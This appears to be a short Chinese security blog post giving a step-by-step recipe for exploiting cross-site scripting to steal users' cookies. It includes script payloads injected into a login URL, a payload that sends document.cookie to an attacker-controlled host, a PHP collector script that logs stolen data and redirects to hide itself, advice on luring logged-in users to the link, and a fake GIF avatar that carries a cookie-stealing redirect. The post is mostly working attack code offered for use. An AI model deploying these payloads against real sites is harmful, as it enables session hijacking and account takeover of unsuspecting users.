跨站脚本执行漏洞代码的几点思路
发布:admin | 发布时间: 2010年1月26日跨站脚本执行漏洞代码的6个思路分析:
1. 构造一个提交,目标是能够显示用户Cookie信息:
| http://www.xxxx.net/txl/login/login.pl?username=<script>alert(document.cookie)</script>&passwd=&ok.x=28&ok.y=6 |
2. 如果上面的请求获得预期的效果,那么我们就可以尝试下面的请求:
| http://www.xxx.net/txl/login/login.pl?username=<script>window.open("http://www.notfound.org/info.php?"%2Bdocument.cookie)</script>&passwd=&ok.x=28&ok.y=6 |
其中http://www.xxx.org/info.php是你能够控制的某台主机上的一个脚本,功能是获取查询字符串的信息,内容如下:
| <?php $info = getenv("QUERY_STRING"); if ($info) { $fp = fopen("info.txt","a"); fwrite($fp,$info."\n"); fclose($fp); } header("Location: http://www.xxx.net"); |
注:"%2B"为"+"的URL编码,并且这里只能用"%2B",因为"+"将被作为空格处理。后面的header语句则纯粹是为了增加隐蔽性。
3. 如果上面的URL能够正确运行的话,下一步就是诱使登陆xxx.net的用户访问该URL,而我们就可以获取该用户Cookie中的敏感信息。
4.
| <IFRAME src="ip" frameBorder=0 width=500 scrolling=noshade height=400></IFRAME> |
5. 就可以自己构造一个下面的头像文件:
| thiz.gif <script> window.location.href="http://c4st.xxx.net/tmp/info.php?’%2Bdocument.cookie; </script> |
6.新建一个x.gif,内容如下:
| <script>alert(document.cookie)</script> |
文章如转载,请注明转载自:http://www.5iadmin.com/post/74.html
- 相关文章:
后一篇:« IIS6的PHP最佳配置方法
发布:admin | 分类:网络安全 | 评论:0 | 引用:0 | 浏览:
| TrackBack引用地址
发表评论
◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。
